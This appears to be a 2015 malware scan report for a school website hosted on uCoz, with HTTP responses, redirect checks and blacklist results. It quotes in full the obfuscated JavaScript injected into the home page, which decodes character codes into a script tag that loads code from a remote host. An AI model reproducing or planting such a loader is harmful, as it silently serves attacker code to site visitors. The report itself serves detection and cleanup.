Scanned pages/files
| Request | Server response | Status |
http://kamenkaschool.at.ua/ | 200 OK Content-Length: 30154 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function yRA988(fm51){document.write( String.fromCharCode(parseInt(fm51)+5));} document.write("<sc"+"ript type='text/javascript' language='javascr"+"ipt' src='"); var v39="99_111_111_107_53_42_42_112_109_106_102_"+ "45_47_41_106_102_106_110_99_96_94_99_102_92_41_105_"+ "96_111_42_110_42_107_96_104_114_71_103_49_50_52_44_"+ "42_58_110_100_95_56_50_46_48_50_43";var DJ459=v39.split("_"); var h436=0;while(h436<DJ459.length){yRA988(DJ459[h436]);h436++;} document.write("'></sc"+"ript>"); Antivirus reports:
| ||
http://s36.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s36.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s36.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
https://partner.privatbank.ua/wv1.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 25 Jan 2015 11:39:34 GMT Location: https://privat24.ua Server: server Content-Length: 0 | clean |
https://privat24.ua/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Cache-Control: private Connection: close Date: Sun, 25 Jan 2015 11:39:34 GMT Location: https://www.privat24.ua/ Server: nginx Content-Length: 178 Content-Type: text/html Expires: Sun, 25 Jan 2015 11:39:33 GMT Strict-Transport-Security: max-age=47347200; includeSubDomains | clean |
https://www.privat24.ua/ | 200 OK Content-Length: 1584 Content-Type: text/html | clean |
https://www.privat24.ua/js/includes.min.js?v=1.0.3 | 200 OK Content-Length: 302694 Content-Type: application/x-javascript | clean |
https://partner.privatbank.ua/js/index.js?v=1.0.3 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 25 Jan 2015 11:39:37 GMT Location: https://privat24.ua Server: server Content-Length: 0 | clean |
http://privat24.ua/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache Cache-Control: max-age=-1 Connection: close Date: Sun, 25 Jan 2015 11:39:37 GMT Location: https://www.privat24.ua Server: nginx Content-Length: 178 Content-Type: text/html Expires: Sun, 25 Jan 2015 11:39:36 GMT Strict-Transport-Security: max-age=47347200; includeSubDomains | clean |
http://www.privat24.ua/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=864000 Cache-Control: max-age=-1 Connection: Close Date: Sun, 25 Jan 2015 11:39:37 GMT Location: https://www.privat24.ua Server: nginx Content-Length: 178 Content-Type: text/html Expires: Wed, 04 Feb 2015 11:39:37 GMT | clean |
https://partner.privatbank.ua//www.googleadservices.com/pagead/conversion.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 25 Jan 2015 11:39:38 GMT Location: https://privat24.ua Server: server Content-Length: 0 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kamenkaschool.at.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Sun, 25 Jan 2015 11:39:36 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 2kamenkaschooluCoz=; path=/; expires=Fri, 25-Jan-2013 11:39:35 GMT; domain=.kamenkaschool.at.ua;
Set-Cookie: 2kamenkaschooluzll=1422185975; path=/; expires=Mon, 25-Jan-2016 11:39:35 GMT; domain=.kamenkaschool.at.ua;
Set-Cookie: 2kamenkaschooluCoz=; path=/; expires=Fri, 25-Jan-2013 11:39:35 GMT; domain=.kamenkaschool.at.ua;
GET / HTTP/1.1
Host: kamenkaschool.at.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-store
Cache-Control: private
Connection: close
Date: Sun, 25 Jan 2015 11:39:36 GMT
Pragma: no-cache
Server: uServ/3.2.2
Content-Type: text/html; charset=UTF-8
Set-Cookie: 2kamenkaschooluCoz=; path=/; expires=Fri, 25-Jan-2013 11:39:35 GMT; domain=.kamenkaschool.at.ua;
Set-Cookie: 2kamenkaschooluzll=1422185975; path=/; expires=Mon, 25-Jan-2016 11:39:35 GMT; domain=.kamenkaschool.at.ua;
Set-Cookie: 2kamenkaschooluCoz=; path=/; expires=Fri, 25-Jan-2013 11:39:35 GMT; domain=.kamenkaschool.at.ua;
Second query (visit from search engine):
GET / HTTP/1.1
Host: kamenkaschool.at.ua
Referer: http://www.google.com/search?q=kamenkaschool.at.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kamenkaschool.at.ua
Referer: http://www.google.com/search?q=kamenkaschool.at.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kamenkaschool.at.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kamenkaschool.at.ua/
Result: kamenkaschool.at.ua is not infected or malware details are not published yet.
Result: kamenkaschool.at.ua is not infected or malware details are not published yet.